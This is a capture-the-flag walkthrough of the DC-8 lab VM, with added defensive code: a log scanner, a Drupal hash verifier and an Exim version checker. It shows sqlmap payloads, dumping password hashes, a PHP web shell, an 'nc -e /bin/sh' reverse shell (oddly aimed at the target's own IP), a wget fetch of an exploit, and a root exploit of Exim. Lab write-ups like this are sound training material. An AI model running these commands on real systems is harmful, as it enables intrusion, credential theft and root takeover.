vulnhub-DC-8

Information gathering

As usual, start with an nmap port scan.

└─# nmap -A -p1-65535 192.168.20.138
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-25 18:46 CST
Nmap scan report for 192.168.20.138
Host is up (0.0013s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA)
| 256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA)
|_ 256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519)
80/tcp open http Apache httpd
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache
|_http-title: Welcome to DC-8 | DC-8
MAC Address: 00:0C:29:1B:50:44 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 1.32 ms 192.168.20.138

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.49 seconds

SQL injection

Looking at the service on port 80, it is Drupal again, but this time the public exploits did not work; it has presumably been patched. Hovering the mouse over the blue links shows that pages are requested with a GET parameter, so SQL injection is likely. Run sqlmap against it.

sqlmap -u "http://192.168.20.138/?nid=1"
---
Parameter: nid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: nid=1 AND 5944=5944

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: nid=1 AND (SELECT 3337 FROM(SELECT COUNT(*),CONCAT(0x7178766b71,(SELECT (ELT(3337=3337,1))),0x71786b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: nid=1 AND (SELECT 5434 FROM (SELECT(SLEEP(5)))wqBX)

Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: nid=-9850 UNION ALL SELECT CONCAT(0x7178766b71,0x564868785a6f6e56754157534e7a534e6b6e49534c53534e494474764256526f586f597369476c79,0x71786b7171)-- -
---
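All four techniques sqlmap reports here share one observable: the `nid` parameter, which Drupal expects to be a node id, arrives as something other than a plain integer. The following is an added defender-side example, not part of the original write-up, that runs that check over constructed Apache access-log lines (the sample lines, log format, timestamps and user-agent strings are assumptions; the payload shapes are the ones shown in the sqlmap output above). It flags any non-numeric `nid` and labels the technique where a signature matches, so an analyst sees boolean, time-based and UNION probes as one campaign from one source.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache access-log lines (not from the page): one normal visitor and a
# scanner run replaying the payload shapes reported in the sqlmap output above.
SAMPLE_LOG = """\
192.168.20.129 - - [25/Nov/2024:18:50:01 +0800] "GET /?nid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.20.129 - - [25/Nov/2024:18:50:02 +0800] "GET /?nid=1%20AND%205944%3D5944 HTTP/1.1" 200 5120 "-" "sqlmap/1.8"
192.168.20.129 - - [25/Nov/2024:18:50:03 +0800] "GET /?nid=1%20AND%20%28SELECT%205434%20FROM%20%28SELECT%28SLEEP%285%29%29%29wqBX%29 HTTP/1.1" 200 5120 "-" "sqlmap/1.8"
192.168.20.129 - - [25/Nov/2024:18:50:04 +0800] "GET /?nid=-9850%20UNION%20ALL%20SELECT%20CONCAT%280x7178766b71%2C0x41%2C0x71786b7171%29--%20- HTTP/1.1" 200 5120 "-" "sqlmap/1.8"
192.168.20.129 - - [25/Nov/2024:18:50:05 +0800] "GET /?nid=3 HTTP/1.1" 200 4800 "-" "Mozilla/5.0"
"""

# Apache "combined" log format: ip ident user [ts] "method target proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# One signature per injection technique sqlmap reported for this parameter.
SIGNATURES = [
    ("boolean-based tautology", re.compile(r"\bAND\b\s+\d+\s*=\s*\d+", re.I)),
    ("UNION query", re.compile(r"\bUNION\b.*\bSELECT\b", re.I)),
    ("time-based", re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)),
    ("error-based (FLOOR/RAND)", re.compile(r"FLOOR\s*\(\s*RAND\s*\(", re.I)),
    ("hex-encoded string literal", re.compile(r"0x[0-9a-f]{4,}", re.I)),
]


def classify_nid(value: str) -> list:
    """Return the reasons a decoded nid value looks injected; a bare node id gives none."""
    if re.fullmatch(r"\d+", value):
        return []
    reasons = [name for name, rx in SIGNATURES if rx.search(value)]
    # Anything non-numeric is worth a look even when no signature matches (novel payloads).
    return reasons or ["non-numeric nid"]


def scan_access_log(lines) -> list:
    """Flag every request whose nid query parameter is anything other than an integer."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash on junk
        query = urlsplit(m.group("target")).query
        # parse_qs percent-decodes the values, so signatures run on what the app saw.
        for value in parse_qs(query, keep_blank_values=True).get("nid", []):
            reasons = classify_nid(value)
            if reasons:
                findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                                 "ua": m.group("ua"), "nid": value, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f"{f['ts']} {f['ip']} ua={f['ua']!r} nid={f['nid']!r} -> {', '.join(f['reasons'])}")
```

The user-agent is recorded but deliberately not used as a signal, because a scanner's UA is trivially changed; the integer allowlist on `nid` is what catches the probes regardless of tooling, and the same rule (cast to int, reject otherwise) is the fix on the application side.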

It is indeed SQL injectable, so dump the user data directly.

sqlmap -u "http://192.168.20.138/?nid=1" -D d7db -T users -C name,mail,pass --dump --batch

+--------+-----------------------+---------------------------------------------------------+
| name | mail | pass |
+--------+-----------------------+---------------------------------------------------------+
| admin | dcau-user@outlook.com | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john | john@blahsdfsfd.org | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
+--------+-----------------------+---------------------------------------------------------+

The user name john is an obvious hint to crack the password with John the Ripper.

john 1.txt

It cracks to turtle. There is no visible login page because the front page has been replaced, but from the earlier machines we know this framework's login path is /user/login, so log in there directly.
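Why a wordlist attack on these `$S$` hashes is feasible is worth seeing in code. Below is an added example, not from the original write-up, that ports Drupal 7's `_password_crypt()` (salted SHA-512 iterated 2^n times with a phpass-style base64 alphabet, truncated to 55 characters) to Python and verifies the john hash from the dump above against the password the post cracked; the test password `correct horse`, the salt `abcdefgh` and the function names are assumptions. The setting character `D` gives 2^15 = 32768 iterations, which is Drupal 7's default and slows a GPU cracker only modestly, so a six-letter dictionary word still falls in seconds.

```python
import hashlib
import hmac
import os

# Drupal 7 password.inc alphabet, as used by _password_itoa64().
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55            # DRUPAL_HASH_LENGTH: stored hashes are truncated to 55 chars
MIN_LOG2, MAX_LOG2 = 7, 30  # DRUPAL_MIN_HASH_COUNT / DRUPAL_MAX_HASH_COUNT
DEFAULT_LOG2 = 15           # DRUPAL_HASH_COUNT: 2**15 = 32768 iterations

# Hash of user "john" exactly as dumped from the d7db users table above.
JOHN_HASH = "$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF"


def _password_base64_encode(data: bytes) -> str:
    """Port of Drupal's _password_base64_encode(): little-endian 6-bit groups over ITOA64."""
    out = []
    i, n = 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def hash_info(stored: str) -> dict:
    """Parse the 12-char setting prefix: '$S$' + log2(iterations) char + 8-char salt."""
    setting = stored[:12]
    if len(setting) != 12 or setting[0] != "$" or setting[2] != "$":
        raise ValueError("not a Drupal hash setting")
    if setting[1] != "S":
        raise ValueError("only $S$ (sha512) hashes are handled here")
    count_log2 = ITOA64.find(setting[3])
    if not MIN_LOG2 <= count_log2 <= MAX_LOG2:
        raise ValueError("iteration count outside Drupal's accepted range")
    return {"algo": "sha512", "count_log2": count_log2,
            "iterations": 1 << count_log2, "salt": setting[4:12]}


def new_salt() -> str:
    """Like _password_generate_salt(): 6 random bytes -> 8 alphabet chars."""
    return _password_base64_encode(os.urandom(6))


def drupal7_hash(password: str, salt: str, count_log2: int = DEFAULT_LOG2) -> str:
    """Port of _password_crypt('sha512', ...): salted, iterated SHA-512, custom base64, cut to 55."""
    if len(salt) != 8 or not MIN_LOG2 <= count_log2 <= MAX_LOG2:
        raise ValueError("bad salt or iteration count")
    pw = password.encode()
    if len(pw) > 512:
        raise ValueError("Drupal refuses passwords over 512 bytes")
    setting = "$S$" + ITOA64[count_log2] + salt
    digest = hashlib.sha512(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):  # PHP: do { ... } while (--$count)
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + _password_base64_encode(digest))[:HASH_LENGTH]


def drupal7_verify(password: str, stored: str) -> bool:
    """Recompute under the stored settings and compare in constant time, as user_check_password() does."""
    try:
        info = hash_info(stored)
    except ValueError:
        return False
    candidate = drupal7_hash(password, info["salt"], info["count_log2"])
    return hmac.compare_digest(candidate, stored)


if __name__ == "__main__":
    print(hash_info(JOHN_HASH))
    print("john/turtle verifies:", drupal7_verify("turtle", JOHN_HASH))
```

The same format is what John the Ripper's `Drupal7` format and hashcat mode 7900 implement; the defensive takeaway is that the iteration count is the only tunable, so a site that keeps user-chosen passwords short or in a dictionary gains little from it.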

After logging in I originally wanted to drop a web shell and browse to it as before, but PHP is not parsed there, and plugins cannot be uploaded either. After a long search I found that the form settings of the webform on the Contact Us page accept PHP, so a web shell can be written there. Note that you must put some text in the confirmation message, otherwise it is not evaluated.

Connect with AntSword and pop a reverse shell.

nc -e /bin/sh 192.168.20.138 1111

nc -lvvp 1111

Privilege escalation via exim

For privilege escalation, the usual routine: first check SUID binaries and sudo. Here exim shows up.

www-data@dc-8:/var/www/html$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/umount
/bin/mount

It is exim4 again; guessing it is vulnerable, check the version.

exim --version
Exim version 4.89 #2 built 14-Jun-2017 05:03:07

Search the exploit database

└─# searchsploit exim 4                                                                       
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Dovecot with Exim - 'sender_address' Remote Command Execution | linux/remote/25297.txt
Exim - 'GHOST' glibc gethostbyname Buffer Overflow (Metasploit) | linux/remote/36421.rb
Exim - 'perl_startup' Local Privilege Escalation (Metasploit) | linux/local/39702.rb
Exim - 'sender_address' Remote Code Execution | linux/remote/25970.py
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation | linux/local/40054.c
Exim 4.41 - 'dns_build_reverse' Local Buffer Overflow | linux/local/756.c
Exim 4.41 - 'dns_build_reverse' Local Read Emails | linux/local/1009.c
Exim 4.42 - Local Privilege Escalation | linux/local/796.sh
Exim 4.43 - 'auth_spa_server()' Remote | linux/remote/812.c
Exim 4.63 - Remote Command Execution | linux/remote/15725.pl
Exim 4.84-3 - Local Privilege Escalation | linux/local/39535.sh
Exim 4.87 - 4.91 - Local Privilege Escalation | linux/local/46996.sh
Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit) | linux/local/47307.rb
Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit) | linux/local/47307.rb
Exim 4.87 < 4.91 - (Local / Remote) Command Execution | linux/remote/46974.txt
Exim 4.89 - 'BDAT' Denial of Service | multiple/dos/43184.txt
exim 4.90 - Remote Code Execution | linux/remote/45671.py
Exim < 4.86.2 - Local Privilege Escalation | linux/local/39549.txt
Exim < 4.90.1 - 'base64d' Remote Code Execution | linux/remote/44571.py
Exim ESMTP 4.80 - glibc gethostbyname Denial of Service | linux/dos/35951.py
Exim Internet Mailer 3.35/3.36/4.10 - Format String | linux/local/22066.c
Exim Sender 3.35 - Verification Remote Stack Buffer Overrun | linux/remote/24093.c
Exim4 < 4.69 - string_format Function Heap Buffer Overflow (Metasploit) | linux/remote/16925.rb
MPlayer 0.9/1.0 - Remote HTTP Header Buffer Overflow | linux/dos/23896.txt
OpenBSD 3.3 - 'Semget()' Integer Overflow (1) | openbsd/local/23046.c
OpenBSD 3.3 - 'Semget()' Integer Overflow (2) | openbsd/local/23047.c
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution | php/webapps/42221.py
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

I wanted an exploit specific to 4.89, but there is no script for exactly that version; there is one for 4.87 - 4.91, so use that.
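Matching a banner against the ranges in those searchsploit titles is the same triage a defender runs over their own fleet. The added example below (not from the original write-up) parses the version out of either `exim --version` output or the SMTP greeting shown later in the post, and reports which of the ranges named above it falls inside; the range table is built only from the titles in the searchsploit output, and the function names are assumptions. One caveat a practitioner needs: Debian backports fixes without bumping the upstream version string, so a hit here is a reason to check the package version (`dpkg -s exim4`) and changelog, not proof by itself.

```python
import re

# Constructed banners matching what the page shows for DC-8.
SAMPLE_VERSION_OUTPUT = "Exim version 4.89 #2 built 14-Jun-2017 05:03:07"
SAMPLE_SMTP_GREETING = "220 dc-8 ESMTP Exim 4.89 Mon, 25 Nov 2024 23:35:17 +1000"

# Ranges taken from the searchsploit titles above:
# (description, lowest affected, upper bound, upper bound inclusive?)
ADVISORIES = [
    ("Local privilege escalation, Exim 4.87 - 4.91 (linux/local/46996.sh)", "4.87", "4.91", True),
    ("Local / remote command execution, Exim 4.87 < 4.91 (linux/remote/46974.txt)", "4.87", "4.91", True),
    ("'base64d' remote code execution, Exim < 4.90.1 (linux/remote/44571.py)", "0", "4.90.1", False),
    ("'BDAT' denial of service, Exim 4.89 (multiple/dos/43184.txt)", "4.89", "4.89", True),
]

VERSION_RE = re.compile(r"\bExim (?:version )?(\d+(?:\.\d+)+)")


def vtuple(version: str) -> tuple:
    """'4.90.1' -> (4, 90, 1); tuples compare lexicographically, which is what dotted versions need."""
    return tuple(int(part) for part in version.split("."))


def parse_exim_version(banner: str) -> str:
    """Pull the dotted version out of `exim --version` output or an ESMTP greeting."""
    m = VERSION_RE.search(banner)
    if not m:
        raise ValueError("no Exim version in banner")
    return m.group(1)


def affected(version: str) -> list:
    """Return the advisory descriptions whose range contains this version."""
    v = vtuple(version)
    hits = []
    for desc, low, high, inclusive in ADVISORIES:
        above_low = v >= vtuple(low)
        below_high = v <= vtuple(high) if inclusive else v < vtuple(high)
        if above_low and below_high:
            hits.append(desc)
    return hits


def triage(banner: str) -> dict:
    """Version string plus matching advisories, for feeding into an inventory or ticket."""
    version = parse_exim_version(banner)
    return {"version": version, "advisories": affected(version)}


if __name__ == "__main__":
    for banner in (SAMPLE_VERSION_OUTPUT, SAMPLE_SMTP_GREETING):
        result = triage(banner)
        print(f"Exim {result['version']}: {len(result['advisories'])} matching advisories")
        for desc in result["advisories"]:
            print("  -", desc)
```

On a Debian 9 host like this one the fix for a 4.89 install arrives as a patched 4.89 package, so the Debian version suffix (visible in `dpkg -s exim4`) is what distinguishes a vulnerable box from a patched one; the upstream number alone is only a first filter.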

Copy the script out:
cp /usr/share/exploitdb/exploits/linux/local/46996.sh /tmp

Start a Python web server:
python3 -m http.server 80

Download it on the target:
www-data@dc-8:/tmp$ wget http://192.168.20.129/46996.sh

The script has two modes:

./46996.sh -m setuid
./46996.sh -m netcat

The first did not get root; the second did.

www-data@dc-8:/tmp$ ./46996.sh -m netcat
./46996.sh -m netcat

raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>

Delivering netcat payload...
220 dc-8 ESMTP Exim 4.89 Mon, 25 Nov 2024 23:35:17 +1000
250 dc-8 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1tFZFF-0000HX-Gz
221 dc-8 closing connection

Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open
python -c "import pty;pty.spawn('/bin/bash')"
python -c "import pty;pty.spawn('/bin/bash')"
root@dc-8:/var/spool/exim4# ls

With that the machine is rooted.

Summary

This machine is quite formulaic and fairly easy; the one slightly tricky part is finding where PHP gets evaluated, and the privilege escalation is far too easy. Key points: SQL injection, exim privilege escalation.